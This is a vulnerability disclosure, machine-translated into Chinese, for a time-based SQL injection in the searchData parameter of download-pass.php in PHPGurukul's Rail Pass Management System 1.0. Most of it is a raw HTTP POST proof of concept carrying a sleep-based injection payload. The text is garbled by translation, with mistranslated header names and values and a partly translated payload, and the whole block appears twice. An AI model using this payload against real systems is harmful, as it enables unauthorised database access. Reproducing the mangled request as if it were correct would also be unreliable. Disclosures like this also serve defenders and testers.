#利用标题:铁路通行证管理系统- “ SearchData”基于时间的SQL注入
#日期: 02/10/2023
#利用作者: Alperen Yozgat
#供应商homepage3360 https://phpgurukul.com/rail-pass-management-system-system-using-php-and-mysql/
#软件link: https://phpgurukul.com/?sdm_process_download=1download_id=17479
#版本: 1.0
#测试在: Kali Linux 6.1.27-1kali1(2023-05-12)X86_64 + XAMPP 7.4.30
## 描述##
在下载pass.php页面上,搜索功能中的搜索数据参数易受SQL注入漏洞的影响。
##概念证明##
#在发送有效载荷后,响应时间将增加到至少5秒。
#payload: 1'or+睡眠(5) - + -
post/rpms/download-pass.php http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:102.0)壁虎/20100101 Firefox/102.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
content-type:应用程序/x-www-form-urlenceded
内容长度: 36
cookie: phpsessID=6028F950766B973640E0FF64485F727B
searchData=1'or+sleep(5) - + - 搜索=
#日期: 02/10/2023
#利用作者: Alperen Yozgat
#供应商homepage3360 https://phpgurukul.com/rail-pass-management-system-system-using-php-and-mysql/
#软件link: https://phpgurukul.com/?sdm_process_download=1download_id=17479
#版本: 1.0
#测试在: Kali Linux 6.1.27-1kali1(2023-05-12)X86_64 + XAMPP 7.4.30
## 描述##
在下载pass.php页面上,搜索功能中的搜索数据参数易受SQL注入漏洞的影响。
##概念证明##
#在发送有效载荷后,响应时间将增加到至少5秒。
#payload: 1'or+睡眠(5) - + -
post/rpms/download-pass.php http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:102.0)壁虎/20100101 Firefox/102.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
content-type:应用程序/x-www-form-urlenceded
内容长度: 36
cookie: phpsessID=6028F950766B973640E0FF64485F727B
searchData=1'or+sleep(5) - + - 搜索=